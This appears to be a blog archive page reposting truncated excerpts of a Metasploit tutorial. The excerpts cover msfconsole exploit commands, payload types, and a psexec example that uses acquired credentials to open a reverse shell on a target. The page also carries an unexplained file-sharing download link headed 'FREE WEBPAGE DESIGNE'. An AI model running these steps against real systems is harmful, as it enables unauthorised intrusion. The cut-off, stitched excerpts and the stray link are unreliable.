Showing posts from January, 2014

FREE WEBPAGE DESIGNE

http://www.sendspace.com/file/26k4ed

Using Exploits

Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to msfconsole.

    msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    msf exploit(ms09_050_smb2_negotiate_func_index) > help
    ...snip...
    Exploit Commands
    ================

        Command       Description
        -------       -----------
        check         Check to see if a target is vulnerable
        exploit       Launch an exploit attempt
        rcheck        Reloads the module and checks if the target is vulnerable
        rexploit      Reloads the module and launches an exploit attempt

    msf exploit(ms09_050_smb2_negotiate_func_index) >

Show

Using an exploit also adds more options to the 'show' command.

Targets

    msf exploit(ms09_050_smb2_negotiate_func_index) > show targets

    Exploit targets:

       Id  Name
       --  ----
       0   Windows Vista SP1/SP2 and Server 2008 (x86)

Payloads

    msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads
    C

Payloads

There are three different types of payload modules in Metasploit: Singles, Stagers, and Stages. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios. Whether or not a payload is staged is represented by '/' in the payload name. For example, "windows/shell_bind_tcp" is a single payload with no stage, whereas "windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).

Singles

Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe.

Stagers

Stagers set up a network connection between the attacker and victim and are designed to be small and reliable. It is difficult to always do both of these well, so the result is multiple similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred one

Exploits

All exploits in the Metasploit Framework will fall into two categories: active and passive.

Active Exploits

Active exploits will exploit a specific host, run until completion, and then exit. Brute-force modules will exit when a shell opens from the victim. Module execution stops if an error is encountered. You can force an active module to the background by passing '-j' to the exploit command:

    msf exploit(ms08_067_netapi) > exploit -j
    [*] Exploit running as background job.
    msf exploit(ms08_067_netapi) >

Example

The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.

    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set RHOST 192.168.1.100
    RHOST => 192.168.1.100
    msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
    PAYLOAD => windows/shell/reverse_tcp
    msf exploit(psexec) > set LHOST 192.168.1.5
    LHOST => 192.168.

Exploits Msfconsole Commands

The msfconsole has many different command options to choose from.

back

Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however, is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally.

    msf auxiliary(ms09_001_write) > back
    msf >

check

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

    msf exploit(ms08_067_netapi) > show options

    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes